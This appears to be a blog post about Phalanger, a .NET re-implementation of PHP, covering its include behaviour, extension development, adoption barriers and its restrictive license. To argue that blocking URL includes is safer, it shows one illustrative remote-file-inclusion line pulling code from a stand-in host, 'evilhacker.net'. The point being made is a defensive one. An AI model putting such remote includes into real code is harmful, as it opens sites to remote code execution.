Programming

Phalanger – better than the real thing?

    Harry Fuecks
    Share

    Have mentioned Phalanger before – a complete re-implementation of PHP for .NET. It’s come a long way since then and they released version 1.0 RC2 last month with a change log that suggests they’ve got common use cases covered and are moving on to “nice to have” edge cases. They’ve also reported success with running phpMyAdmin, phpBB2 and PHP-Nuke under Phalanger.

    Anyway, while reading about how includes work in Phalanger, one paragraph stood out;

    In PHP, you can use either physical paths or URIs to specify a target file of an inclusion. URI has to start with schema specification (http://, ftp://, file://, etc.) which sets it apart from physical path. In the current version, Phalanger doesn’t support URIs in inclusions. URIs are only supported in file-system functions like fopen().

    What’s so exciting here? In short, Phalanger has implemented a better / smarter security policy here than the real PHP, whether by accident or intent.

    With Phalanger you still get to do;

    file_get_contents('http://example.com');

    …without the risk of;

    include 'http://evilhacker.net/somephp.txt';

    Meanwhile, with real PHP (even the latest versions as far as I know) you can either have both or neither – the first is a useful feature while the second is something there is really no legitimate use for but poses a huge security risk.

    For more detail, the issue came up in discussion back in April 1st, 2004 and Simon’s comment summarizes the significance nicely while more detail is in this comment which links back to an old blog entry from Simon. George has also explained this before.

    Anyway – all this got me thinking “What if?”. What if Phalanger doesn’t just aim to be equal to PHP but aims higher? To an extent, perhaps it’s already there.

    For starters, consider what it takes to write extensions. Perhaps the best illustration is this changelog. And compare the source with it’s equivalent here (ZIP). Would you rather write extensions in C (plus learning that API) or C#? Which do you think results in fewer bugs / quicker development? Ian Bicking made the point here.

    Meanwhile the Phalanger benchmarks might raise some eyebrows.

    From my perspective, the main issue for Phalanger uptake is acceptance.

    Right now’s it’s still a Windows only solution which will be a turn off for many. They discuss Mono in the FAQ so that may change one day. The managed code issue (Phalanger supports existing PHP extensions this way) could be solved with a large enough community willing to re-implement in C#. Then again Mono is also looking like a non-event in terms of uptake – Novell seems to be asleep at the wheel.

    Another barrier is the authors aren’t really being open (as in Open Source) with Phalanger. Yes the function implementations are open but the real meat (the PHP parser / runtime) is protected by a restrictive license (see end). Meanwhile, where’s the public subversion / cvs / whatever repository? If you’re running a small development shop these are critical issues for controlling your own destiny. Meanwhile being open is essential for attracting a community of contributing developers. This in not meant as an accusation BTW – I’m sure many hours have gone into this and if you consider how long it’s taken Zend to get where they are, you might well have second thoughts about giving away those hours for free. Perhaps the hope is someone will buy it from them unfortunately that someone doesn’t seem too switched on to real opportunities right now, despite this.

    Otherwise, perhaps there’s something fundamental holding back projects like Phalanger to being “also rans”? Considering IronPython and jython, neither seems to have dull enthusiasm for the the real thing.

    That said, if Phalanger was to get accepted and somehow start turning up on $5 / month shared hosts, would you use it? And what if Phalanger was to implement something like namespaces before the real thing – would that be attractive to you?

    If you answered yes to either of those, the status quo of PHP today starts to look very different.

    That license, which you have to agree to use Phalanger, is;

    Definitions

    Throughout this text, “Authors” denotes the Phalanger Team consisting of Jan Benda, Martin Maly, Tomas Matousek, Pavel Novak, Vaclav Novak and Ladislav Prosek. “Software” denotes the Phalanger – PHP Language Compiler for .NET Framework – version 1.0 produced by the Authors. The latest versions of the Software as well as the license can be found on web site http://www.php-compiler.net.

    This License governs use of the accompanying Software, and your use of the Software constitutes acceptance of this license.

    License Grant and Restrictions

    You may use this Software for any non-commercial or commercial purposes, subject to the restrictions in this license.

    You may not modify the Software. In particular, you may not modify the Class Library which is also distributed in the form of source code.

    You may not reverse engineer, decompile, or disassemble the Software, except and only to the extent that such activity is expressly permitted by applicable law notwithstanding this limitation.

    You may extend this Software and distribute the extensions for non-commercial or commercial purposes, however you may not grant rights to the Software or extensions that are broader than those provided by this License. For example, you may not distribute extensions of the Software under terms that would permit modifying, reverse engineering, decompiling, or disassembling the Software, or under terms that purport to require the Software or extensions to be sublicensed to others.

    If you have extended the Software or created derivative works, and distribute such extensions or derivative works, you will cause the files to carry prominent notices so that recipients know that they are not receiving the original Software. Such notices must state: (i) that you have extended the Software; and (ii) clear delimitation of your extensions.

    We also require you to agree not to remove any copyright or other notices from the Software. If you distribute the Software you have to include a verbatim copy of this license.

    The Authors reserve all rights not expressly granted by this license.

    Termination

    Your rights under the License end automatically if you breach it in any way.

    Limitation on Liability

    THE SOFTWARE COMES “AS IS”, WITH NO WARRANTIES. THIS MEANS NO EXPRESS, IMPLIED OR STATUTORY WARRANTY, INCLUDING WITHOUT LIMITATION, WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR ANY WARRANTY OF TITLE OR NON-INFRINGEMENT.

    THE AUTHORS WILL NOT BE LIABLE FOR ANY DAMAGES RELATED TO THE SOFTWARE OR THIS LICENSE, INCLUDING DIRECT, INDIRECT, SPECIAL, CONSEQUENTIAL OR INCIDENTAL DAMAGES, TO THE MAXIMUM EXTENT THE LAW PERMITS, NO MATTER WHAT LEGAL THEORY IT IS BASED ON.